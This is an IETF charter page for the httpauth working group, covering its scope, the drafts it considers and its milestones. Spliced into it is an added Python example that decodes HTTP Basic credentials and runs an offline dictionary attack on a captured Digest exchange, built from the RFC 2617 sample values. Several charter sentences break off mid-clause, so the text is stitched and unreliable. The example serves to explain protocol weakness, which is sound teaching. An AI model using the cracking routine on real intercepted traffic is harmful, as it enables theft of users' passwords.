

Hypertext Transfer Protocol Authentication (httpauth)


 Current Status: Active

 Chairs:
     Yoav Nir 
     Rifaat Shekh-Yusef 

 Security Area Directors:
     Stephen Farrell 
     Kathleen Moriarty 

 Security Area Advisor:
     Kathleen Moriarty 

 Mailing Lists:
     General Discussion: http-auth@ietf.org
     To Subscribe:       https://www.ietf.org/mailman/listinfo/http-auth
     Archive:            https://mailarchive.ietf.org/arch/browse/http-auth/

Description of Working Group:

  Authentication of users to servers over HTTP has always been a weak
  point in web services.  The current HTTP authentication mechanisms,
  basic and digest, pass the credentials in the clear (basic) or employ
  weak algorithms (digest) and are considered to be insecure today.
  Authentication through non-standard web forms is much more commonly
  used, but also passes the credentials in the clear.  There is a need
  for improved mechanisms that can replace or augment HTTP authentication
  without the need to rely on transport layer security.  Only HTTP
  authentication is in scope for this WG; form-based or "web"
  authentication is out of
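  The following is an added example written for this page, not code from
  the working group or from any of the drafts it lists.  It shows why the
  charter calls the two RFC 2617 schemes weak: a Basic credential is only
  base64-encoded, so anyone who can read the request recovers the
  password; a Digest credential hides the password behind MD5, but every
  other input to the hash is on the wire, so an eavesdropper can run an
  offline dictionary attack against a single captured exchange.  The two
  Authorization headers are constructed inline from the worked examples in
  RFC 2617 (Aladdin/open sesame and Mufasa/Circle Of Life); the candidate
  password list is likewise constructed for the demonstration.

```python
"""Added example (not part of the httpauth charter): what RFC 2617 Basic and
Digest actually put on the wire, and why both are weak without TLS.
Sample headers are constructed inline from the worked values in RFC 2617."""
import base64
import hashlib
import re
from typing import Dict, Iterable, Optional, Tuple

# --- Basic: the credential is base64-encoded, not protected ---------------
# Constructed header using the Aladdin / "open sesame" example from RFC 2617.
BASIC_HEADER = "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ=="


def decode_basic(authorization: str) -> Tuple[str, str]:
    """Recover user-id and password from an Authorization: Basic header.
    Anyone who can read the request (no TLS) can do exactly this."""
    scheme, _, token = authorization.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic credential")
    user_pass = base64.b64decode(token.strip()).decode("latin-1")
    # RFC 2617: the first colon separates user-id from password.
    user, _, password = user_pass.partition(":")
    return user, password


# --- Digest: MD5 over password plus values that are all visible on the wire --
def _md5(s: str) -> str:
    return hashlib.md5(s.encode("latin-1")).hexdigest()


def digest_response(username: str, realm: str, password: str, method: str,
                    uri: str, nonce: str, nc: Optional[str] = None,
                    cnonce: Optional[str] = None, qop: Optional[str] = None) -> str:
    """RFC 2617 request-digest for algorithm=MD5, with or without qop=auth."""
    ha1 = _md5(f"{username}:{realm}:{password}")  # only secret input
    ha2 = _md5(f"{method}:{uri}")
    if qop == "auth":
        return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return _md5(f"{ha1}:{nonce}:{ha2}")  # RFC 2069 compatibility form


def parse_digest(authorization: str) -> Dict[str, str]:
    """Parse the comma-separated, optionally quoted parameters of a Digest header."""
    scheme, _, params = authorization.partition(" ")
    if scheme.lower() != "digest":
        raise ValueError("not a Digest credential")
    return {k: v.strip('"')
            for k, v in re.findall(r'(\w+)=("[^"]*"|[^\s,]+)', params)}


def crack_digest(authorization: str, method: str,
                 candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack on one captured Digest exchange: everything
    except the password is in the header, so each guess costs a few MD5s and
    needs no further interaction with the server."""
    p = parse_digest(authorization)
    for guess in candidates:
        computed = digest_response(p["username"], p["realm"], guess, method,
                                   p["uri"], p["nonce"], p.get("nc"),
                                   p.get("cnonce"), p.get("qop"))
        if computed == p["response"]:
            return guess
    return None


# Constructed Authorization header built from the RFC 2617 section 3.5 values.
DIGEST_HEADER = (
    'Digest username="Mufasa", realm="testrealm@host.com", '
    'nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", uri="/dir/index.html", '
    'qop=auth, nc=00000001, cnonce="0a4f113b", '
    'response="6629fae49393a05397450978507c4ef1", '
    'opaque="5ccc069c403ebaf9f0171e9517f40e41"'
)

# Constructed wordlist for the demonstration.
WORDLIST = ["password", "hakuna matata", "Circle Of Life"]

if __name__ == "__main__":
    print("Basic  ->", decode_basic(BASIC_HEADER))
    print("Digest ->", crack_digest(DIGEST_HEADER, "GET", WORDLIST))
```

  The nonce stops replay of a captured response, but it does nothing for
  password secrecy: the attacker's guess is verified against the very
  nonce the server chose.  That is the gap the charter's "without the
  need to rely on transport layer security" wording points at.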

  The httpauth WG will be a short-lived working group that will document
  a small number of HTTP user authentication schemes that might offer
  security benefits, and that could, following experimentation, be
  widely adopted as standards-track schemes for HTTP user
  authentication. Each of these RFCs will be Informational or
  Experimental, and should include a description of when use of its
  mechanism is appropriate, via a use-case or other distinguishing
  characteristics.  Standards track solutions for HTTP Authentication
  schemes are out of scope, as none of the proposals are expected to be
  sufficiently widely deployed to warrant that status before the WG

  All schemes to be developed in the httpauth WG must be usable with the
  existing HTTP authentication framework, or with evolutions of that
  framework as developed in the httpbis WG. That is, the evolution of
  the HTTP authentication framework is to be done in the httpbis WG and
  not in the httpauth WG.

  The httpauth WG will work closely with the httpbis WG to ensure that
  the outcomes from the httpauth WG do not conflict with work done

  The drafts currently under consideration as WG items include:
  - draft-williams-http-rest-auth
  - draft-oiwa-http-mutualauth and draft-oiwa-http-auth-extension
  - draft-farrell-httpbis-hoba
  - draft-montenegro-httpbis-multilegged-auth
  - draft-melnikov-httpbis-scram-auth

  The WG will produce two standards track documents that will obsolete
  the basic and digest schemes defined in RFC 2617, taking into account
  errata on that specification.

  For the digest scheme, the new specification will incorporate "more
  modern" algorithm agility and internationalization support, which
  requires input from internationalization experts.
  draft-ahrens-httpbis-digest-auth-update documents one possible
  approach that the WG could adopt and modify as it sees fit.

  For the basic scheme, no technical changes are envisaged other than to
  handle internationalization of usernames and passwords.  The goal is
  to improve the scheme's documentation and to obsolete RFC 2617, which
  has some significant flaws that have emerged through 13 years of

  The WG is not required to merge all proposals into one. The goal is
  not to produce "perfect" mechanisms, but to review and improve
  proposals and to quickly produce stable specifications for the purpose
  of obtaining implementation and deployment experience.  The working
  group will then close, and any further culling or refinement of the
  experimental mechanisms will be done in another context.

  It is expected that the market/community will select which if any of
  the RFCs developed might be worth progressing on the standards-track
  at a later date, in a different WG.

  Adoption of additional work items is not expected and will require a

  The following are explicitly out of scope:
  - changes to TLS
  - changes to HTTP, except for those made in the httpbis WG
  - definition of authentication mechanisms that do not work with
    the HTTP authentication framework
  - authentication schemes that distinguish between devices and humans
  - authentication schemes that cannot be sensibly used for and
    by humans
  - "web" authentication that is not HTTP authentication

Goals and Milestones:
  May 2013 - Adopt -00 version of experimental drafts
  Jun 2013 - Adopt -00 version of Basic and Digest update drafts (or a "basic+digest" draft - singular)
  Oct 2013 - Send basic+digest to IETF LC (following WGLC, of course)
  Nov 2013 - Begin WGLC on experimental drafts
  Feb 2014 - All experimental drafts to IETF LC
  Jun 2014 - Recharter or close
